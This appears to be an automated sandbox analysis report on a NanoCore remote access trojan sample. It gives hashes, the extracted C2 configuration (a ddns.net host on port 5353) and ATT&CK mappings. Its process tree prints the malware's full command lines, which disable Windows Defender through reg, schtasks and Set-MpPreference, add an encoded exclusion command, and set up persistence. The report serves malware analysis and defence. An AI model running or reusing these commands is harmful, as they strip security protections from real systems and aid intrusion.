nanocore | 8af4c53b8010c14e5a07c9f72ec0172588ef13d7aa04afa1332666732d95cb0f

Analysis

max time kernel
144s
max time network
153s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
07-07-2024 12:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Retrack Woofer.exe
Size

804KB
MD5

ae3f1e9ec89b546f4542ab3b3df5f593
SHA1

578044dc221016ef0a09fef215f731170fbfe6cd
SHA256

8af4c53b8010c14e5a07c9f72ec0172588ef13d7aa04afa1332666732d95cb0f
SHA512

57ff387cd6a66e5fe312b0ce383f5423625d20e0f9d1ecdf78e52c729ff9d73feaaec4751450f152be313793fe8dc3d4c656be802e0f8f876d36e65564eeb2b3
SSDEEP

24576:06mTXNe2tyyucITeGvlC6g9joXzFqeECi:lmhrClF9DzzF8

Score

10^/10

nanocore evasion execution keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

spooferstuff.ddns.net:5353

127.0.0.1:5353

Mutex

482e8ee1-3df0-47fd-8c26-2c648a678339

Attributes

activate_away_mode
false
backup_connection_host
127.0.0.1
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2024-04-18T14:03:03.298334336Z
bypass_user_account_control
false
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
clear_access_control
false
clear_zone_identifier
false
connect_delay
4000
connection_port
5353
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
29991
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
482e8ee1-3df0-47fd-8c26-2c648a678339
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
spooferstuff.ddns.net
primary_dns_server
8.8.8.8
request_elevation
false
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
false
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Windows\Plugin.vbs	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exeWScript.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Executes dropped EXE 3 IoCs

Processes:

Plugin (2).exeUpdateService.exeRetrack spoof.exe

pid process

2672 Plugin (2).exe
2544 UpdateService.exe
1720 Retrack spoof.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

pid	process
2672	Plugin (2).exe
2544	UpdateService.exe
1720	Retrack spoof.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

UpdateService.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DSL Service = "C:\\Program Files (x86)\\DSL Service\\dslsv.exe"	UpdateService.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

UpdateService.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UpdateService.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	UpdateService.exe

Drops file in Program Files directory 2 IoCs

Processes:

UpdateService.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\DSL Service\dslsv.exe	UpdateService.exe
File created	C:\Program Files (x86)\DSL Service\dslsv.exe	UpdateService.exe

Drops file in Windows directory 4 IoCs

Processes:

Retrack Woofer.exe

description	ioc	process
File created	C:\Windows\Plugin.vbs	Retrack Woofer.exe
File created	C:\Windows\UpdateService.exe	Retrack Woofer.exe
File created	C:\Windows\Retrack spoof.exe	Retrack Woofer.exe
File created	C:\Windows\Plugin (2).exe	Retrack Woofer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2776 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2568 1720 WerFault.exe Retrack spoof.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2588 schtasks.exe
2320 schtasks.exe

pid	pid_target	process	target process
2568	1720	WerFault.exe	Retrack spoof.exe

pid	process
2588	schtasks.exe
2320	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeUpdateService.exe

pid	process
2776	powershell.exe
2908	powershell.exe
1064	powershell.exe
1380	powershell.exe
2820	powershell.exe
2324	powershell.exe
1632	powershell.exe
2868	powershell.exe
352	powershell.exe
2348	powershell.exe
836	powershell.exe
788	powershell.exe
2544	UpdateService.exe
2544	UpdateService.exe
2544	UpdateService.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

UpdateService.exe

pid process

2544 UpdateService.exe

pid	process
2544	UpdateService.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeUpdateService.exe

description	pid	process
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	352	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeDebugPrivilege	788	powershell.exe
Token: SeDebugPrivilege	2544	UpdateService.exe
Token: SeDebugPrivilege	2544	UpdateService.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Retrack Woofer.exePlugin (2).execmd.exeWScript.exeWScript.exe

description	pid	process	target process
PID 2200 wrote to memory of 2776	2200	Retrack Woofer.exe	powershell.exe
PID 2200 wrote to memory of 2776	2200	Retrack Woofer.exe	powershell.exe
PID 2200 wrote to memory of 2776	2200	Retrack Woofer.exe	powershell.exe
PID 2200 wrote to memory of 2672	2200	Retrack Woofer.exe	Plugin (2).exe
PID 2200 wrote to memory of 2672	2200	Retrack Woofer.exe	Plugin (2).exe
PID 2200 wrote to memory of 2672	2200	Retrack Woofer.exe	Plugin (2).exe
PID 2200 wrote to memory of 2672	2200	Retrack Woofer.exe	Plugin (2).exe
PID 2200 wrote to memory of 2680	2200	Retrack Woofer.exe	WScript.exe
PID 2200 wrote to memory of 2680	2200	Retrack Woofer.exe	WScript.exe
PID 2200 wrote to memory of 2680	2200	Retrack Woofer.exe	WScript.exe
PID 2200 wrote to memory of 2544	2200	Retrack Woofer.exe	UpdateService.exe
PID 2200 wrote to memory of 2544	2200	Retrack Woofer.exe	UpdateService.exe
PID 2200 wrote to memory of 2544	2200	Retrack Woofer.exe	UpdateService.exe
PID 2200 wrote to memory of 2544	2200	Retrack Woofer.exe	UpdateService.exe
PID 2200 wrote to memory of 2544	2200	Retrack Woofer.exe	UpdateService.exe
PID 2200 wrote to memory of 2544	2200	Retrack Woofer.exe	UpdateService.exe
PID 2200 wrote to memory of 2544	2200	Retrack Woofer.exe	UpdateService.exe
PID 2200 wrote to memory of 1720	2200	Retrack Woofer.exe	Retrack spoof.exe
PID 2200 wrote to memory of 1720	2200	Retrack Woofer.exe	Retrack spoof.exe
PID 2200 wrote to memory of 1720	2200	Retrack Woofer.exe	Retrack spoof.exe
PID 2200 wrote to memory of 1720	2200	Retrack Woofer.exe	Retrack spoof.exe
PID 2672 wrote to memory of 2796	2672	Plugin (2).exe	cmd.exe
PID 2672 wrote to memory of 2796	2672	Plugin (2).exe	cmd.exe
PID 2672 wrote to memory of 2796	2672	Plugin (2).exe	cmd.exe
PID 2672 wrote to memory of 2796	2672	Plugin (2).exe	cmd.exe
PID 2796 wrote to memory of 1080	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 1080	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 1080	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 2856	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 2856	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 2856	2796	cmd.exe	reg.exe
PID 2680 wrote to memory of 668	2680	WScript.exe	WScript.exe
PID 2680 wrote to memory of 668	2680	WScript.exe	WScript.exe
PID 2680 wrote to memory of 668	2680	WScript.exe	WScript.exe
PID 2796 wrote to memory of 2464	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 2464	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 2464	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 1140	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 1140	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 1140	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 2080	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 2080	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 2080	2796	cmd.exe	reg.exe
PID 668 wrote to memory of 1380	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 1380	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 1380	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 1064	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 1064	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 1064	668	WScript.exe	powershell.exe
PID 2796 wrote to memory of 1624	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 1624	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 1624	2796	cmd.exe	reg.exe
PID 668 wrote to memory of 2908	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 2908	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 2908	668	WScript.exe	powershell.exe
PID 2796 wrote to memory of 1964	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 1964	2796	cmd.exe	reg.exe
PID 2796 wrote to memory of 1964	2796	cmd.exe	reg.exe
PID 668 wrote to memory of 2324	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 2324	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 2324	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 2820	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 2820	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 2820	668	WScript.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Retrack Woofer.exe
"C:\Users\Admin\AppData\Local\Temp\Retrack Woofer.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAcABkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAcwBmACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776

C:\Windows\Plugin (2).exe
"C:\Windows\Plugin (2).exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2672

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5274.tmp\5275.tmp\5276.bat "C:\Windows\Plugin (2).exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:2796

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:1080

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:2856

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:2464

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
4⤵
PID:1140

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2080

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1624

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1964

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2620

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:332

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:2040

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:1508

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:1336

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:1884

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:708

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:2876

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:1472

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:2380

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:2104

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:1596

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:2804

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:2648

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:2636

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:2852

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:2656

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:2744

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1708

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2576

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2712

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2632

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:2792

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Plugin.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:2680

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Plugin.vbs" /elevate
3⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:788

C:\Windows\UpdateService.exe
"C:\Windows\UpdateService.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DSL Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp6661.tmp"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2320

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DSL Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp69AC.tmp"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2588

C:\Windows\Retrack spoof.exe
"C:\Windows\Retrack spoof.exe"
2⤵
- Executes dropped EXE
PID:1720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 628
3⤵
- Program crash
PID:2568

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5274.tmp\5275.tmp\5276.bat
Filesize
3KB

MD5
3557fd8df9f2eea025db00b6037057c2

SHA1
6c01403cfb5386f41d8ee223c267eb3e6f2f9b83

SHA256
7d97b0e1010946dd695028f47ffaccb47bce0fac5bb7dce3644865bb0fb71f16

SHA512
da78ae660a548c62d72e29442d5af4d48f36a7a16181eb6bef67a955a40a58e7fcb79d83aea35445a809b0f204164320b0a48a23b6342c2c1b0d698363b0d6bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6661.tmp
Filesize
1KB

MD5
ed3053ed60029bce7a0f9346dd78af27

SHA1
e71a66591d17ba57786302055e546bd864fb918b

SHA256
5a7448b5c48843d6112ecca9e7d92f13e6f887a1674dc107144cb0188523b380

SHA512
104e67817b32d185e88918e29694daaf474866bd1b9ad64421ae70a73371c89b2deee3aa02d0cbf5ab654ca0a267b6d109ffac88bca0d97536a1e283b04591a5

Download Submit
